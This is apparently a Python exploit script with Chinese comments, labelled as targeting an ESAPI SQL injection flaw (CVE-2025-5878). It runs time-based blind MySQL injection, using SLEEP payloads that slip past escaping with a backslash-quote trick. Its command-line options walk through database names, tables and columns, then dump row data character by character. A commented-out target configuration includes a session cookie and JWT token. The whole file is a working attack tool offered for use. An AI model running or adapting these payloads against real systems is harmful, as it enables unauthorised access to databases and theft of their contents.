import argparse import re import sys import requests import time import string # 目标配置 # url = "http://192.168.122.1:8888/vulnapi/sqli/jdbc/safe3" # param_name = "id" # cookies = {"JSESSIONID=70D53458ADD0D92F6BE69DC0F13DF22F;JWT_TOKEN=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3ODA2NDY5NDgsImV4cCI6MTc4MDczMzM0OCwidXNlcm5hbWUiOiJhZG1pbiJ9.FLQCMsMxCgYOvMoU5k7KDLlv-jIgBw8zKzDrwEUBTR4"} # 延时判断阈值(秒) # self.sleep_time = 5 # timeout = 3 class ESAPISQLExploit: def __init__(self, url, cookies, headers): self.param_name = self._extract_param_name(url) self.url = url.split('?')[0] self.cookies = self._parse_cookies(cookies) if cookies else {} self.headers = headers self.timeout = 3 self.sleep_time = 5 def _extract_param_name(self,url): """提取 ? 和 = 之间的参数名""" # 方法1:正则表达式 match = re.search(r'\?([^=]+)=', url) if match: return match.group(1) def _parse_cookies(self, cookie_str): """ 解析cookie字符串为字典 Args: cookie_str: "name1=value1; name2=value2" 格式的字符串 Returns: dict: cookie字典 """ cookies = {} if isinstance(cookie_str, str): # 分割多个cookie for item in cookie_str.split(';'): item = item.strip() if '=' in item: key, value = item.split('=', 1) cookies[key.strip()] = value.strip() elif isinstance(cookie_str, dict): # 如果已经是字典,直接使用 cookies = cookie_str return cookies def has_sleep(self,payload): """判断payload是否触发延时""" paramsDouble = {self.param_name: payload} start = time.time() try: response = requests.get(url=self.url, params = paramsDouble, cookies = self.cookies, headers=self.headers, timeout=self.timeout) elapsed = time.time() - start return elapsed >= self.sleep_time except requests.Timeout: # 超时也可能表示触发延时,根据实际情况判断 return True def calc_length(self): lengthTemp = 0 for i in range(1, 50): # 示例payload:MySQL payload = f"1\\' AND IF(length(database())>{i},0,SLEEP({self.sleep_time}))-- -" # PostgreSQL 版本 # payload = f"1%5c' AND CASE WHEN (SUBSTRING(current_database(),{i},1)='{c}') THEN pg_sleep({self.sleep_time}) ELSE NULL END-- -" if self.has_sleep(payload): print(f"\n数据库长度{i}") lengthTemp = i break return lengthTemp def inject_database_name(self, lengthTemp): """获取数据库名""" db_name = "" print("[*] 开始获取数据库名...") for i in range(1, lengthTemp + 1): for c in range(45,123): # 示例payload:MySQL payload = f"1\\' AND IF(ascii(SUBSTRING(database(),{i},1))>{c},0,SLEEP({self.sleep_time}))-- -" # PostgreSQL 版本 # payload = f"1%5c' AND CASE WHEN (SUBSTRING(current_database(),{i},1)='{c}') THEN pg_sleep({self.sleep_time}) ELSE NULL END-- -" print(f"\r[*] 正在猜测第 {i} 位: {chr(c)}", end="") if self.has_sleep(payload): db_name += chr(c) print(f"\n[+] 第 {i} 位: {chr(c)}") break print(f"\n[+] 数据库名: {db_name}") return db_name def inject_table_name(self, db_name): """获取表名""" tables = [] print(f"\n[*] 开始获取 {db_name} 库的表名...") # 先获取表数量 table_count = 0 for i in range(1, 20): payload = f"1\\' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=\"{db_name}\")>={i},SLEEP({self.sleep_time}),0)-- -" if self.has_sleep(payload): table_count = i else: break print(f"[+] 共发现 {table_count} 个表") # 逐个获取表名 for t in range(1, table_count + 1): table_name = "" for i in range(1, 50): for c in string.ascii_lowercase + string.digits + "_": payload = f"1\\' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=\"{db_name}\" LIMIT {t - 1},1),{i},1)=\"{c}\",SLEEP({self.sleep_time}),0)-- -" print(f"\r[*] 第 {t} 个表: {table_name}{c}", end="") if self.has_sleep(payload): table_name += c print(f"\n[+] 第 {t} 个表第 {i} 位: {c}") break else: break tables.append(table_name) print(f"\n[+] 表名列表: {tables}") return tables def inject_column_name(self, database_name, table_name): """获取列名""" columns = [] print(f"\n[*] 开始获取 {table_name} 表的列名...") # 获取列数量 col_count = 0 for i in range(1, 30): payload = f"1\\' AND IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_name=\"{table_name}\" and table_schema=\"{database_name}\")>={i},SLEEP({self.sleep_time}),0)-- -" if self.has_sleep(payload): col_count = i else: break print(f"[+] 共发现 {col_count} 个列") # 逐个获取列名 for c in range(1, col_count + 1): col_name = "" for i in range(1, 50): for ch in string.ascii_lowercase + string.digits + "_": payload = f"1\\' AND IF(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name=\"{table_name}\" and table_schema=\"{database_name}\" LIMIT {c - 1},1),{i},1)=\"{ch}\",SLEEP({self.sleep_time}),0)-- -" print(f"\r[*] 第 {c} 个列: {col_name}{ch}", end="") if self.has_sleep(payload): col_name += ch print(f"\n[+] 第 {c} 个列第 {i} 位: {ch}") break else: break columns.append(col_name) print(f"\n[+] 列名列表: {columns}") return columns def inject_data(self, table_name, column_name): """获取数据""" data_list = [] print(f"\n[*] 开始获取 {table_name}.{column_name} 数据...") # 先获取行数 row_count = 0 for i in range(1, 100): payload = f"1\\' AND IF((SELECT COUNT(*) FROM {table_name})>={i},SLEEP({self.sleep_time}),0)-- -" if self.has_sleep(payload): row_count = i else: break print(f"[+] 共发现 {row_count} 行数据") # 逐个获取每行的数据长度和数据 for r in range(1, row_count + 1): # 先获取该行数据的长度 data_len = 0 for i in range(1, 256): payload = f"1\\' AND IF((SELECT LENGTH({column_name}) FROM {table_name} LIMIT {r - 1},1)<={i},SLEEP({self.sleep_time}),0)-- -" if self.has_sleep(payload): data_len = i break print(f"[*] 第 {r} 行数据长度为: {data_len}") # 逐位获取数据 data = "" for i in range(1, data_len + 1): for ch in string.printable: if ch == "'": continue # 使用 ASCII 码判断(更稳定) payload = f"1\\' AND IF(ASCII(SUBSTRING((SELECT {column_name} FROM {table_name} LIMIT {r - 1},1),{i},1))={ord(ch)},SLEEP({self.sleep_time}),0)-- -" print(f"\r[*] 第 {r} 行数据: {data}{ch}", end="") if self.has_sleep(payload): data += ch break else: # 如果找不到,尝试二分法搜索ASCII low, high = 32, 126 while low <= high: mid = (low + high) // 2 payload = f"1\\' AND IF(ASCII(SUBSTRING((SELECT {column_name} FROM {table_name} LIMIT {r - 1},1),{i},1))>={mid},SLEEP({self.sleep_time}),0)-- -" if self.has_sleep(payload): low = mid + 1 else: high = mid - 1 ascii_val = high if ascii_val >= 32: data += chr(ascii_val) print(f"\r[*] 第 {r} 行数据: {data}", end="") break data_list.append(data) print(f"\n[+] 第 {r} 行数据: {data}") print(f"\n[+] 数据为: {data_list}") return data_list if __name__ == "__main__": parser = argparse.ArgumentParser(description="ESAPI SQLinjection CVE-2025-5878 Exploit") parser.add_argument("-u", "--url", required=True, help="base URL (ej: http://target.com:3000?id=1)") parser.add_argument("-c", "--cookie", required=True,help="Cookie字符串,格式: 'name1=value1; name2=value2'") parser.add_argument("--dbs", action="store_true", help="获取数据库名称") parser.add_argument("--tables", action="store_true", help="获取表名") parser.add_argument("--columns", action="store_true", help="获取指定表的列名(需要先执行-T)") parser.add_argument("-D", "--db", help="指定数据库名称") parser.add_argument("-T", "--table", help="指定获取表名") parser.add_argument("-C", "--column", help="获取指定表的列名(需要先执行-T)") parser.add_argument("--dump", action="store_true",help="导出指定表的数据(格式: 表名,列名1,列名2)") args = parser.parse_args() # 验证URL格式 if not args.url or '?' not in args.url or '=' not in args.url: print("[-] 错误:URL必须包含 '?' 和 '=' 参数") print(f" 示例: {args.url}?id=1") sys.exit(1) headers = {"User-Agent": "Mozilla/5.0"} # 初始化exploit对象 exploit = ESAPISQLExploit(url= args.url, cookies= args.cookie, headers=headers) # 显示目标信息 print(f"[*] 目标URL: {args.url}") if args.cookie: print(f"[*] 使用Cookie: {args.cookie}") # 执行顺序检查:必须先执行-T才能执行-C if args.column and not args.table: print("[-] 错误:必须先使用 -T 获取表名,才能使用 -C 获取列名") print(" 正确顺序: python exploit.py -u -T # 先获取表名") print(" python exploit.py -u -C # 再获取列名") sys.exit(1) length = 10 # 执行命令 if args.dbs: length = exploit.calc_length() exploit.inject_database_name(length) else: if args.db is not None: if args.tables: exploit.inject_table_name(args.db) else: if args.table is not None: if args.columns: exploit.inject_column_name(args.db, args.table) else: if args.column is not None: if args.dump: exploit.inject_data(args.table, args.column) else: print("请先爆破列名或指定列名") else: print("请先爆破表名或指定表库名") else: print("请先爆破数据库名或指定数据库名")